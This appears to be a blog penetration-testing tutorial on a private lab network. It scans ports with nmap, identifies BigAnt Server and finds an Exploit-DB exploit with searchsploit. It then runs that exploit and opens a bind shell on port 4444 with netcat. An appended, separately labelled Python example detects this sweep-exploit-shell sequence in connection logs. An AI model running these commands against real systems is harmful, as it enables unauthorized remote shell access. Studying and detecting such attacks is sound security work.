Posted by shinigami at 02:00
Read our previous post
In this case, I will use an exploit from the Exploit-DB repository. First we need to gather information about the target; I'm using Nmap to do that.
root@bt# nmap -p20-7000 172.16.227.130
The -p option tells nmap which ports to scan on the target; here the range is 20 to 7000. You can modify the range.
The result of this scan is:
From the images above, you can see that we get two unknown ports (6660 and 6661). To find out what these ports are, we search Google with the keyword "application with port 6660 6661". The result is "BigAnt Server", so next I will search for a BigAnt exploit in the exploit-db repository.
How to use searchsploit: simply run this command:
/pentest/exploits/exploitdb/searchsploit [keyword] [platform] [type[remote|local]]
root@bt# /pentest/exploits/exploitdb/searchsploit bigant windows remote
There are many exploits for BigAnt, so we need to try them one by one. I will try this one:
BigAnt Server 2.52 SEH (0day) /windows/remote/10765.py
To use this exploit, we can read the script with a text editor, for example kwrite.
kwrite /pentest/exploits/exploitdb/platforms/windows/remote/10765.py
Okay, you got it? I got it :D
#root@BT4VM:~# ./bigant.py 192.168.87.130
#Exploit sent! Connect to remote host on port 4444
#
#root@BT4VM:~# nc -vn 192.168.87.130 4444
Now, run the command:
root@bt# python /pentest/exploits/exploitdb/platforms/windows/remote/10765.py 172.16.227.130
Next, connect to the target using Netcat:
root@bt# nc -v 172.16.227.130 4444
Done.
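As an added defender-side example (not part of the original post), here is how the sequence above shows up in connection logs and how to flag it: a port sweep from one source, then contact with the BigAnt ports (6660/6661, as identified by the scan), then an inbound connection to port 4444, the port the exploit's own banner says to connect to afterwards. The attacker address, the log record format and the sweep threshold are assumptions.

```python
from collections import defaultdict

BIGANT_PORTS = {6660, 6661}   # ports the scan attributed to BigAnt Server
BIND_SHELL_PORT = 4444        # port the exploit banner says to connect to afterwards
SWEEP_THRESHOLD = 20          # distinct dst ports from one src -> treat as a port sweep

def constructed_records():
    """Constructed connection records (src, dst, dport) in time order.
    The attacker address 172.16.227.1 is an assumption; the target is the
    address scanned in the post."""
    attacker, target = "172.16.227.1", "172.16.227.130"
    recs = [(attacker, target, p) for p in range(20, 60)]   # part of the nmap sweep
    recs.append((attacker, target, 6660))                    # exploit delivered to BigAnt
    recs.append((attacker, target, BIND_SHELL_PORT))         # nc -v target 4444
    recs.append(("172.16.227.50", target, 6660))             # ordinary BigAnt client
    recs.append(("172.16.227.51", target, BIND_SHELL_PORT))  # stray hit on 4444, no sweep
    return recs

def analyze(records):
    """Return {(src, dst): stage}, where stage is the furthest step of the
    chain seen in order: 1 = port sweep, 2 = sweep then BigAnt port contact,
    3 = that followed by a connection to the bind shell port."""
    ports_seen = defaultdict(set)
    stage = defaultdict(int)
    for src, dst, dport in records:
        key = (src, dst)
        ports_seen[key].add(dport)
        if stage[key] == 0 and len(ports_seen[key]) >= SWEEP_THRESHOLD:
            stage[key] = 1
        if stage[key] == 1 and dport in BIGANT_PORTS:
            stage[key] = 2
        if stage[key] == 2 and dport == BIND_SHELL_PORT:
            stage[key] = 3
    return dict(stage)

def alerts(records):
    """Human-readable alerts for every (src, dst) pair that reached stage 3."""
    return [f"{src} -> {dst}: sweep, BigAnt port contact, then connection to "
            f"port {BIND_SHELL_PORT} (likely post-exploitation bind shell)"
            for (src, dst), s in analyze(records).items() if s == 3]

if __name__ == "__main__":
    for line in alerts(constructed_records()):
        print(line)
```

Only the source that completed all three steps in order is reported; a normal BigAnt client or an isolated hit on 4444 stays at stage 0.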